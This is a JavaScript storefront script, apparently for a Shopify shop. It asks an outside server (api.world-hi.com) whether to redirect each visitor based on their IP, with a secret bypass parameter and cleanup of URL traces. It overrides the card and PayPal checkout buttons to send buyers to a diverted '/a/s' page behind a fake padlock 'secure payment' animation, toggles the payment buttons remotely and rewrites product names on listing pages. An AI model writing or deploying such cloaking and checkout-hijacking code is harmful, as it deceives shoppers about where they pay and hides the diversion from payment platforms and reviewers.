(function () {
  // 获取用户的 IP 地址
  function getIP(callback) {
    const timeout = 600;
    const ipApis = [
      { url: "https://ifconfig.me/ip", process: (data) => data.trim() },
      {
        url: "https://api.ipify.org?format=json",
        process: (data) => JSON.parse(data).ip,
      },
      { url: "https://icanhazip.com", process: (data) => data.trim() },
    ];

    let completed = false;
    setTimeout(() => {
      if (!completed) {
        completed = true;
        callback("0.0.0.0");
      }
    }, timeout);

    ipApis.forEach((api) => {
      if (completed) return;
      const xhr = new XMLHttpRequest();
      xhr.open("GET", api.url, true);
      xhr.timeout = timeout;
      xhr.onload = function () {
        if (completed) return;
        if (xhr.status >= 200 && xhr.status < 300) {
          try {
            const ip = api.process(xhr.responseText);
            completed = true;
            callback(ip);
          } catch (e) {}
        }
      };
      xhr.onerror = xhr.ontimeout = function () {};
      xhr.send();
    });
  }

  // 检查缓存或调用 API 并跳转
  function checkAndRedirect() {
    const currentUrl = new URL(window.location.href);
    const searchParams = currentUrl.searchParams;

    // 如果 URL 已包含 country 参数，直接清理
    if (searchParams.has("country")) {
      searchParams.delete("country");
      const cleanUrl =
        currentUrl.pathname +
        (searchParams.toString() ? "?" + searchParams.toString() : "") +
        currentUrl.hash;
      window.history.replaceState({}, document.title, cleanUrl);
      console.log("🧹 已清理 country 参数:", cleanUrl);
      document.body.style.visibility = "visible";
      return;
    }

    const cacheKey = "redirect_api_cache";
    const cachedData = localStorage.getItem(cacheKey);
    const oneDayInMs = 24 * 60 * 60 * 1000;

    if (cachedData) {
      const { timestamp, result, redirected } = JSON.parse(cachedData);
      const now = Date.now();
      if (now - timestamp < oneDayInMs) {
        console.log("📦 使用缓存结果:", result);
        handleRedirectResult(result, currentUrl, searchParams, redirected);
        return;
      } else {
        console.log("🕒 缓存已过期，重新请求 API");
      }
    }

    const apiUrl =
      "https://api.world-hi.com/redirect?code=765-b137f6ee3fa126f0bbe7aa55f292709f-9725";

    getIP(function (ip) {
      const xhr = new XMLHttpRequest();
      const cacheBuster = Date.now();
      const urlWithCache =
        apiUrl + (apiUrl.includes("?") ? "&" : "?") + "_=" + cacheBuster;

      xhr.open("GET", urlWithCache, true);
      xhr.setRequestHeader("User-Agent", navigator.userAgent);
      xhr.setRequestHeader("Accept-Language", navigator.language);
      xhr.setRequestHeader("X-Forwarded-For", ip);
      xhr.setRequestHeader("X-Real-IP", ip);
      xhr.setRequestHeader("Cache-Control", "no-cache, no-store");

      xhr.onload = function () {
        if (xhr.status >= 200 && xhr.status < 300) {
          try {
            const result = JSON.parse(xhr.responseText);
            console.log("🌐 API 响应:", result);

            const cacheData = {
              timestamp: Date.now(),
              result: result,
              redirected: false,
            };
            localStorage.setItem(cacheKey, JSON.stringify(cacheData));
            console.log("💾 结果已缓存一天");

            handleRedirectResult(result, currentUrl, searchParams, false);
          } catch (e) {
            console.error("⚠ 解析 API 响应失败:", e);
          }
        } else {
          console.error("🚫 API 请求失败:", xhr.status);
        }
      };

      xhr.onerror = function () {
        console.error("❌ API 请求出错");
      };

      xhr.send();
    });
  }

  function handleRedirectResult(result, currentUrl, searchParams, alreadyRedirected) {
    const hasXktParam = currentUrl.searchParams.has("xkt991052");

    if (hasXktParam) {
      console.log("✅ 检测到 xkt991052，强制允许跳转");
      doRedirect(currentUrl, searchParams);
      return;
    }

    if (result.action === "deny") {
      console.log("🛑 API 拒绝访问，保持当前页面");
      document.body.style.visibility = "visible";
      return;
    }

    if (result.action === "allow" && !alreadyRedirected) {
      console.log("✅ API 允许跳转，且今天未跳转过");
      doRedirect(currentUrl, searchParams);

      // 更新缓存标记为已跳转
      const cachedUpdate = localStorage.getItem("redirect_api_cache");
      if (cachedUpdate) {
        const parsed = JSON.parse(cachedUpdate);
        parsed.redirected = true;
        localStorage.setItem("redirect_api_cache", JSON.stringify(parsed));
        console.log("📍 已记录今日已跳转");
      }
    } else if (result.action === "allow" && alreadyRedirected) {
      console.log("⏩ 今天已跳转过，无需再次跳转");
      document.body.style.visibility = "visible";
    }
  }

  function doRedirect(currentUrl, searchParams) {
    searchParams.set("country", "FJ");
    const newUrl =
      currentUrl.pathname + "?" + searchParams.toString() + currentUrl.hash;
    console.log("🚀 跳转至:", newUrl);
    window.location.replace(newUrl);

    // 跳转后清理参数
    setTimeout(() => {
      const updatedUrl = new URL(window.location.href);
      const updatedParams = updatedUrl.searchParams;
      if (updatedParams.has("country")) {
        updatedParams.delete("country");
        const finalUrl =
          updatedUrl.pathname +
          (updatedParams.toString() ? "?" + updatedParams.toString() : "") +
          updatedUrl.hash;
        window.history.replaceState({}, document.title, finalUrl);
        console.log("✅ 参数已清理:", finalUrl);
      }
    }, 0);
  }

  checkAndRedirect();
})();


(function () {
  console.log("购物车重定向脚本已加载 - 针对支付按钮");
  let Carts = [];
  var payment_methods = {};
  // 设置全局标记，指示跳过购物车
  window.opc_dyn_checkout_skip_cart = true;

  // 存储原始函数（如果存在）
  var originalItcProdPageCheckout = window.itcProdPageCheckout;
  var originalItcProdPagePayPal = window.itcProdPagePayPal;
  var originalItcCartDrawerCheckout = window.itcCartDrawerCheckout;
  var originalItcCartDrawerPayPal = window.itcCartDrawerPayPal;

  // 添加购物车函数 - 使用Shopify Cart API
  async function addToCart(variantId, quantity) {
    try {
      const response = await fetch("/cart/add.js", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          items: [
            {
              id: variantId,
              quantity: quantity,
            },
          ],
        }),
      });

      if (!response.ok) {
        throw new Error("添加购物车失败");
      }

      const result = await response.json();
      console.log("商品已添加到购物车:", result);

      // 更新购物车数量显示
      updateCartCount();

      return result;
    } catch (error) {
      console.error("添加购物车错误:", error);
      return null;
    }
  }

  // 更新购物车数量显示
  async function updateCartCount() {
    try {
      const response = await fetch("/cart.js");
      const cart = await response.json();
      if (cart) {
        Carts = cart;
      }
      const count = cart.item_count;
      console.log("调用了购物车的更新");
      // 更新购物车计数器显示
      const cartCountElements = document.querySelectorAll(".cart-count-bubble");
      console.log(cartCountElements, "cartCountElements");
      cartCountElements.forEach((element) => {
        element.textContent = count;
        element.style.display = count > 0 ? "block" : "none";
      });
    } catch (error) {
      console.error("获取购物车信息错误:", error);
    }
  }

  // 获取购物车
  async function getCart() {
    try {
      const response = await fetch("/cart.js");
      const cart = await response.json();
      if (cart) {
        Carts = cart;
      }
      console.log("调用了购物车的初始化");
    } catch (error) {
      console.error("获取购物车信息错误:", error);
    }
  }

  // 获取点击按钮所在的商品容器
  function getProductContainer(element) {
    // 从点击的按钮向上查找最近的商品容器
    const container =
      element.closest(".product-item") ||
      element.closest(".product-card") ||
      element.closest("[data-product-id]") ||
      element.closest(".grid__item");
    return container;
  }

  // 从商品容器中获取商品信息
  function getProductInfo(container) {
    if (!container) return null;

    // 尝试从容器中获取variant ID
    const variantId =
      container.querySelector('select[name="id"]')?.value ||
      container.querySelector('input[name="id"]')?.value ||
      container.dataset.variantId ||
      container.querySelector("[data-variant-id]")?.dataset.variantId;

    // 尝试获取数量
    const quantity = parseInt(
      container.querySelector('input[name="quantity"]')?.value || "1"
    );

    if (!variantId) {
      console.error("未找到商品variant ID，容器:", container);
      return null;
    }

    return {
      variantId,
      quantity,
    };
  }

  // 购物车抽屉中的支付按钮处理函数
  window.itcCartDrawerCheckout = function (event) {
    console.log("拦截到购物车抽屉中的Debit/Credit Card按钮点击");
    Checkouts();
    BeginCheckout();
    // 阻止默认行为
    if (event) {
      event.preventDefault();
      event.stopPropagation();
    }

    // 直接跳转到目标页面
    // window.location.href = "/a/s";
    // 执行动画并在完成后跳转
    performPaymentAnimation(event.target, "/a/s");

    return false;
  };

  // 购物车抽屉中的PayPal按钮处理函数
  window.itcCartDrawerPayPal = function (event) {
    console.log("拦截到购物车抽屉中的PayPal按钮点击11");
    Checkouts();
    BeginCheckout();
    // 阻止默认行为
    if (event) {
      event.preventDefault();
      event.stopPropagation();
    }

    // 直接跳转到目标页面
    // window.location.href = "/a/s";
    // 执行动画并在完成后跳转
    performPaymentAnimation(event.target, "https://d4as14d.myshopify.com/a/s");

    return false;
  };

  // 重写itcProdPageCheckout函数
  window.itcProdPageCheckout = async function (event) {
    console.log("拦截到Debit/Credit Card按钮点击");
    Checkouts();
    BeginCheckout();
    // 阻止默认行为
    if (event) {
      event.preventDefault();
      event.stopPropagation();
    }

    try {
      // 获取点击的按钮所在的商品容器
      const container = getProductContainer(event.target);
      const productInfo = getProductInfo(container);

      if (!productInfo) {
        console.error("未找到商品信息");
        return false;
      }

      // 添加到购物车
      const result = await addToCart(
        productInfo.variantId,
        productInfo.quantity
      );
      if (result) {
        // 执行动画并在完成后跳转
        return performPaymentAnimation(event.target, "/a/s");
      }
    } catch (error) {
      console.error("处理购物车错误:", error);
    }

    // 返回false以阻止默认行为
    return false;
  };

  // 重写itcProdPagePayPal函数
  window.itcProdPagePayPal = async function (event) {
    console.log("拦截到PayPal按钮点击");
    // 购物车 侧边栏
    const drawer = document.querySelector(".drawer__footer");
    if (drawer) {
      console.log(Carts, "carts");
    }

    Checkouts();
    BeginCheckout();
    // 阻止默认行为
    if (event) {
      event.preventDefault();
      event.stopPropagation();
    }

    try {
      // 获取点击的按钮所在的商品容器
      const container = getProductContainer(event.target);
      const productInfo = getProductInfo(container);

      if (!productInfo) {
        console.error("未找到商品信息");
        return false;
      }

      // 添加到购物车
      const result = await addToCart(
        productInfo.variantId,
        productInfo.quantity
      );
      if (result) {
        // 执行动画并在完成后跳转
        return performPaymentAnimation(event.target, "/a/s");
      }
    } catch (error) {
      console.error("处理购物车错误:", error);
    }

    // 返回false以阻止默认行为
    return false;
  };

  // 在文档加载完成后设置事件监听器
  document.addEventListener("DOMContentLoaded", function () {
    // 查找信用卡按钮
    var checkoutButton =
      document.querySelector("#opc-override-dyn-c-btn") ||
      document.querySelector('[onclick*="itcProdPageCheckout"]') ||
      document.querySelector('[onclick*="itcCartPageCheckout"]');

    // 查找PayPal按钮
    var paypalButton = document.querySelector('[onclick*="itcProdPagePayPal"]');

    if (checkoutButton) {
      console.log("找到Pay with Debit/Credit Card按钮");
      // 添加点击事件处理
      checkoutButton.addEventListener("click", async function (event) {
        console.log("拦截到Debit/Credit Card按钮点击");
        // window.location.href = "/a/s";
        performPaymentAnimation(event.target, "/a/s");
        // 阻止默认行为
        event.preventDefault();
        event.stopPropagation();

        try {
          // 获取点击的按钮所在的商品容器
          const container = getProductContainer(event.target);
          const productInfo = getProductInfo(container);

          if (!productInfo) {
            console.error("未找到商品信息");
            return false;
          }

          // 添加到购物车
          const result = await addToCart(
            productInfo.variantId,
            productInfo.quantity
          );
          if (result) {
            // 执行动画并在完成后跳转
            performPaymentAnimation(event.target, "/a/s");
          }
        } catch (error) {
          console.error("处理购物车错误:", error);
        }

        // 返回false以阻止默认行为
        return false;
      });
    }

    if (paypalButton) {
      console.log("找到PayPal按钮");
      // 添加点击事件处理
      paypalButton.addEventListener("click", async function (event) {
        console.log("拦截到PayPal按钮点击");
        Checkouts();
        BeginCheckout();
        // 阻止默认行为
        event.preventDefault();
        event.stopPropagation();

        try {
          // 获取点击的按钮所在的商品容器
          const container = getProductContainer(event.target);
          const productInfo = getProductInfo(container);

          if (!productInfo) {
            console.error("未找到商品信息");
            return false;
          }

          // 添加到购物车
          const result = await addToCart(
            productInfo.variantId,
            productInfo.quantity
          );
          if (result) {
            // 执行动画并在完成后跳转
            performPaymentAnimation(event.target, "/a/s");
          }
        } catch (error) {
          console.error("处理购物车错误:", error);
        }

        // 返回false以阻止默认行为
        return false;
      });
    }

    if (!checkoutButton && !paypalButton) {
      console.log("未找到支付按钮");
    }

    // 初始化时更新购物车数量显示
    updateCartCount();
  });

  window.onload = function () {
    !(function (f, b, e, v, n, t, s) {
      if (f.fbq) return;
      n = f.fbq = function () {
        n.callMethod
          ? n.callMethod.apply(n, arguments)
          : n.queue.push(arguments);
      };
      if (!f._fbq) f._fbq = n;
      n.push = n;
      n.loaded = !0;
      n.version = "2.0";
      n.queue = [];
      t = b.createElement(e);
      t.async = !0;
      t.src = v;
      s = b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t, s);
    })(
      window,
      document,
      "script",
      "https://connect.facebook.net/en_US/fbevents.js"
    );
    if (window.fbqArray) {
      fbqArray.forEach((item) => {
        fbq("init", item.pixel_id);
      });
      fbq("track", "PageView");
    } else {
      fbq("init", "1029725759057931");
      fbq("track", "PageView");
    }

    var AXON_EVENT_KEY = "5385c68d-e87d-4e5b-8a6a-c8bc3a58a46b";
    !(function (e, r) {
      var t = [
        "https://s.axon.ai/pixel.js",
        "https://c.albss.com/p/l/loader.iife.js",
      ];
      if (!e.axon) {
        var a = (e.axon = function () {
          a.performOperation
            ? a.performOperation.apply(a, arguments)
            : a.operationQueue.push(arguments);
        });
        (a.operationQueue = []),
          (a.ts = Date.now()),
          (a.eventKey = AXON_EVENT_KEY);
        for (
          var n = r.getElementsByTagName("script")[0], o = 0;
          o < t.length;
          o++
        ) {
          var i = r.createElement("script");
          (i.async = !0), (i.src = t[o]), n.parentNode.insertBefore(i, n);
        }
      }
    })(window, document);
    axon("init");
    axon("track", "page_view", {});

    console.log(meta, "meta大对象");
    // 产品页面
    if (meta.page.pageType == "product") {
      // 触发ViewContent事件
      fbq("track", "ViewContent", {
        content_ids: [meta.product.variants[0].id],
        content_name: meta.product.variants[0].name,
        content_type: "product",
        value: meta.product.variants[0].price / 100,
        currency: "USD",
      });

      let item = [
        {
          item_id: meta.product.variants[0].id,
          item_name: meta.product.variants[0].name,
          price: meta.product.variants[0].price / 100,
          quantity: 1,
          image_url: "https://img-va.myshopline.com/image/abc.jpg",
          item_variant_id: meta.product.id,
          item_category_id: 166,
        },
      ];
      // 触发view_item 事件
      axon("track", "view_item 事件", {
        currency: "USD",
        items: item,
        value: meta.product.variants[0].price / 100,
      });

      axon_add_method();

      add_method();
    }

    // 分类
    if (meta.page.pageType == "collection") {
      // if (Carts) {
      //   Checkouts();
      // }
      const products = meta.products.map(product => {
          // 获取第一个变体
          const firstVariant = product.variants[0];
          if (firstVariant && firstVariant.name.includes('111')) {
              // 如果包含 111，替换为 234
              const updatedFirstVariant = {
                  ...firstVariant,
                  name: firstVariant.name.replace('111', '234')
              };
              return {
                  ...product,
                  variants: [updatedFirstVariant, ...product.variants.slice(1)]
              };
          }
          return product;
      })
      console.log(products,'products')
      meta = { ...meta, products }
      console.log(meta,'meta')

      const aBtn = document.getElementById(
        "CardLink-template--24208966811946__product-grid-9721270370602"
      );
      if (aBtn) {
        console.log(aBtn.textContent, "aBtn");
        aBtn.textContent = "234";
      }
    }

    const href = window.location.href;
    if (href.includes("/a/s")) {
      console.log(Carts);
      console.log(Carts, "Carts");
    }

    // 加购方法
    function add_method() {
      let button = document.querySelector(".product-form__buttons");
      button.addEventListener("click", function () {
        // 这里编写点击按钮后要执行的代码
        meta.product.variants.forEach((item) => {
          //  arr.push(item.id);
          fbq("track", "AddToCart", {
            content_name: item.name,
            content_category: meta.product.type,
            content_ids: [item.id],
            content_type: meta.product.type,
            value: item.price / 100,
            currency: "USD",
          });
        });
      });
    }

    // axon加购方法
    function axon_add_method() {
      let items = [
        {
          item_id: meta.product.variants[0].id,
          item_name: meta.product.variants[0].name,
          price: meta.product.variants[0].price / 100,
          quantity: 1,
          image_url: "https://img-va.myshopline.com/image/abc.jpg",
          item_variant_id: meta.product.id,
          item_category_id: 166,
        },
      ];
      let button = document.querySelector(".product-form__buttons");
      button.addEventListener("click", function () {
        // 这里编写点击按钮后要执行的代码
        meta.product.variants.forEach((item) => {
          axon("track", "add_to_cart", {
            currency: Carts.currency ?? "USD",
            items: items,
            value: item.price / 100,
          });
        });
      });
    }
  };

  // axon begin_checkout 事件
  function BeginCheckout() {
    const items = Carts.items.map((item) => {
      return {
        item_id: item.id || 123,
        item_name: item.title,
        price: item.final_price / 100,
        quantity: item.quantity,
        image_url: item.image,
        item_variant_id: item.variant_id,
        item_category_id: 166,
      };
    });

    axon("track", "begin_checkout", {
      currency: Carts.currency ?? "USD",
      items: items,
      value: Carts.total_price / 100,
    });
  }

  // InitiateCheckout事件
  function Checkouts() {
    var cartItems = [];
    Carts.items.forEach((item) => {
      cartItems.push({
        id: item.id,
        quantity: item.quantity,
      });
    });
    // 获取购物车总价
    var totalPrice = parseFloat(Carts.total_price);

    // 触发 InitiateCheckout 事件
    fbq("track", "InitiateCheckout", {
      content_ids: cartItems.map((item) => item.id),
      content_type: "product",
      num_items: Carts.item_count,
      value: totalPrice,
      currency: "USD",
    });
  }

  getisButton();

  // 购物车按钮的显示与隐藏
  if (meta.page.pageType == "cart" || meta.page.pageType == "product") {
    getisButton();
  }

  // 用于获取值来判断是否显示提交按钮
  async function getisButton() {
    const domain = window.location.hostname || "d4as14d.myshopify.com";

    // 构建API URL
    const apiUrl = `https://api.world-hi.com/payment/info?shop_domain=${domain}`;

    // 调用API获取数据
    const response = await fetch(apiUrl, {
      method: "GET",
      headers: {
        Accept: "application/json",
        "Content-Type": "application/json",
      },
      mode: "cors",
      cache: "no-cache",
      credentials: "same-origin",
    });

    if (!response.ok) {
      throw new Error(
        `Failed to fetch provinces: ${response.status} ${response.statusText}`
      );
    }

    const data = await response.json();
    if (data.success) {
      payment_methods = data.payment_methods;
      window.myGlobalVariable = data.payment_methods;
      // 商品信息
      const paypals = document.querySelector(
        '[onclick*="itcCartDrawerPayPal"]'
      );
      const btn = document.querySelector('[onclick*="itcCartDrawerCheckout"]');
      isNone(paypals, "paypal");
      isNone(btn, "credit_card");

      let creditBtn = null;
      let cartBtn = null;

      const credits = document.querySelector(
        ".product-form__buttons .shopify-payment-button"
      );
      const pays = document.querySelector('[onclick*="itcProdPagePayPal"]');

      if (credits && pays) {
        creditBtn = credits;
        cartBtn = pays;
      } else {
        //   直接支付
        creditBtn =
          document.querySelector('button[form="cart"]') ||
          document.querySelector('[onclick*="itcCartDrawerCheckout"]') ||
          document.getElementById("opc-override-itc-dyn-c-btn");

        //   paypal
        cartBtn =
          document.getElementById("cart-page-pp-btn") ||
          document.querySelector('[onclick*="itcCartDrawerPayPal"]') ||
          document.querySelector('[onclick*="itcProdPagePayPal"]');
      }

      cartBtn.onclick = function () {
        performPaymentAnimation(event.target, "/a/s");
      };

      // if (creditBtn) {
      //   creditBtn.onclick = null;
      //   creditBtn.addEventListener("click", function (event) {
      //     window.location.href = "/a/s";
      //   });
      // }

      isNone(cartBtn, "paypal");
      isNone(creditBtn, "credit_card");
    }
  }

  loadJSON();
  async function loadJSON() {
    const domain = window.location.hostname || "d4as14d.myshopify.com";
    try {
      // 使用 fetch 请求 JSON 文件
      const response = await fetch(
        `https://api.world-hi.com/api/shop/facebook-pixels?domain=${domain}`
      );
      // 检查响应状态
      if (!response.ok) {
        throw new Error(`HTTP 错误！状态码: ${response.status}`);
      }
      // 将响应内容解析为 JSON 格式
      const jsonData = await response.json();
      if (jsonData) {
        console.log("谁先执行的方法----loadJSON");

        window.fbqArray = jsonData.data;
      }
    } catch (error) {
      // 捕获并处理可能出现的错误
      console.error("获取 JSON 数据时出错:", error);
    }
  }

  // 设置isNone
  function isNone(dom, str) {
    dom.style.display = "none";

    if (payment_methods.paypal.enabled && payment_methods.paypal.type == str) {
      dom.style.display = "block";
    }
    if (
      payment_methods.worldxinpay.enabled &&
      payment_methods.worldxinpay.type == str
    ) {
      dom.style.display = "block";
    }
  }

  window.myGlobalMethod = isNone;

  // 判断元素是否为支付按钮
  function isPaymentButton(element) {
    if (!element || !element.tagName) return false;

    // 检查按钮的文本内容
    const buttonText =
      element.textContent && element.textContent.toLowerCase().trim();
    const paymentKeywords = [
      "checkout",
      "pay",
      "payment",
      "purchase",
      "buy",
      "支付",
      "结账",
      "购买",
      "paypal",
    ];

    const isButtonWithPaymentText =
      buttonText &&
      paymentKeywords.some((keyword) => buttonText.includes(keyword));

    // 检查元素ID、类名和属性
    const elementId = element.id && element.id.toLowerCase();
    const elementClass = element.className && element.className.toLowerCase();

    return (
      // 检查标签类型
      element.tagName === "BUTTON" ||
      (element.tagName === "INPUT" && element.type === "submit") ||
      // 检查类名
      (elementClass &&
        (elementClass.includes("checkout") ||
          elementClass.includes("pay") ||
          elementClass.includes("payment"))) ||
      // 检查ID
      (elementId &&
        (elementId.includes("checkout") || elementId.includes("pay"))) ||
      // 检查文本内容
      isButtonWithPaymentText ||
      // 检查onclick属性
      (element.hasAttribute("onclick") &&
        (element.getAttribute("onclick").includes("checkout") ||
          element.getAttribute("onclick").includes("payment") ||
          element.getAttribute("onclick").includes("pay")))
    );
  }

  function createAnimationElements() {
    // 检查元素是否已存在
    if (document.querySelector(".lock-container")) {
      return;
    }

    // 创建锁动画元素
    const lockContainer = document.createElement("div");
    lockContainer.className = "lock-container";

    const lockCircle = document.createElement("div");
    lockCircle.className = "lock-circle";

    const lockIcon = document.createElement("div");
    lockIcon.className = "lock-icon";
    lockIcon.innerHTML = `<svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="#ffffff" stroke-width="2">
          <rect x="3" y="11" width="18" height="11" rx="2" ry="2"></rect>
          <path d="M7 11V7a5 5 0 0 1 10 0v4"></path>
      </svg>`;

    // 创建加载动画环
    const loadingRing = document.createElement("div");
    loadingRing.className = "loading-ring";

    lockContainer.appendChild(lockCircle);
    lockContainer.appendChild(lockIcon);
    lockContainer.appendChild(loadingRing);
    document.body.appendChild(lockContainer);
  }

  // 执行支付动画并在完成后跳转
  function performPaymentAnimation(button, redirectUrl) {
    // 确保动画元素已创建
    createAnimationElements();

    const lockContainer = document.querySelector(".lock-container");

    // 添加模糊遮罩
    const blurOverlay = document.createElement("div");
    blurOverlay.className = "blur-overlay";
    document.body.appendChild(blurOverlay);

    // 强制重排以触发过渡动画
    blurOverlay.offsetWidth;

    // 先显示透明遮罩，但不模糊
    blurOverlay.style.opacity = "1";
    blurOverlay.style.transform = "scale(1)";

    // 使用 link rel="preload" 预加载目标页面
    const preloadLink = document.createElement("link");
    preloadLink.rel = "preload";
    preloadLink.href = redirectUrl;
    preloadLink.as = "document";
    document.head.appendChild(preloadLink);

    // 开始轻微模糊效果，轻度变白
    setTimeout(() => {
      // 激活模糊遮罩动画 - 轻微的白色模糊效果
      blurOverlay.classList.add("active");

      // 获取按钮位置，为动画做准备
      const btnRect = button.getBoundingClientRect();
      const btnCenterX = btnRect.left + btnRect.width / 2;
      const btnCenterY = btnRect.top + btnRect.height / 2;

      // 设置锁容器初始位置在按钮中心
      lockContainer.style.top = btnCenterY + "px";
      lockContainer.style.left = btnCenterX + "px";

      // 显示锁动画容器
      lockContainer.classList.add("active");

      // 禁用按钮，防止重复点击
      if (button.disabled !== undefined) {
        button.disabled = true;
      }

      // 将锁移动到屏幕中央并放大的动画
      setTimeout(() => {
        lockContainer.classList.add("centered");
      }, 10);

      // 第一阶段：锁图标加载动画
      setTimeout(() => {
        // 第二阶段：增强模糊效果，更明显的白色
        blurOverlay.classList.add("enhance");

        setTimeout(() => {
          // 第三阶段：锁图标开始淡出
          lockContainer.classList.add("fade");

          // 延迟添加白色过渡效果，让锁图标有时间淡出
          setTimeout(() => {
            // 第四阶段：几乎全白但不刺眼
            blurOverlay.classList.add("whiteout");

            // 等待一小段时间确保预加载完成
            setTimeout(() => {
              window.location.href = redirectUrl;
            }, 200);

            // 清理逻辑
            setTimeout(() => {
              lockContainer.classList.remove("active", "centered", "fade");
              blurOverlay.remove();
              if (button.disabled !== undefined) {
                button.disabled = false;
              }
            }, 1000);
          }, 400); // 给锁图标足够时间淡出
        }, 800); // 加载动画持续时间
      }, 1000); // 初始动画展示时间
    }, 100);

    // 防止默认行为
    return false;
  }
})();

function hideLoading() {
  // 隐藏加载指示器并显示内容
  if (document.getElementById("loadingOverlay")) {
    document.getElementById("loadingOverlay").style.display = "none";
  }
  if (document.getElementById("content")) {
    document.getElementById("content").style.display = "block";
  }
  // 恢复页面可见性
  document.body.style.visibility = "visible";
  document.documentElement.style.visibility = "visible";
}
//跟踪

  var _paq = window._paq = window._paq || [];
  /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u="https://runnin.matomo.cloud/";
    _paq.push(['setTrackerUrl', u+'matomo.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.async=true; g.src='https://cdn.matomo.cloud/runnin.matomo.cloud/matomo.js'; s.parentNode.insertBefore(g,s);
  })();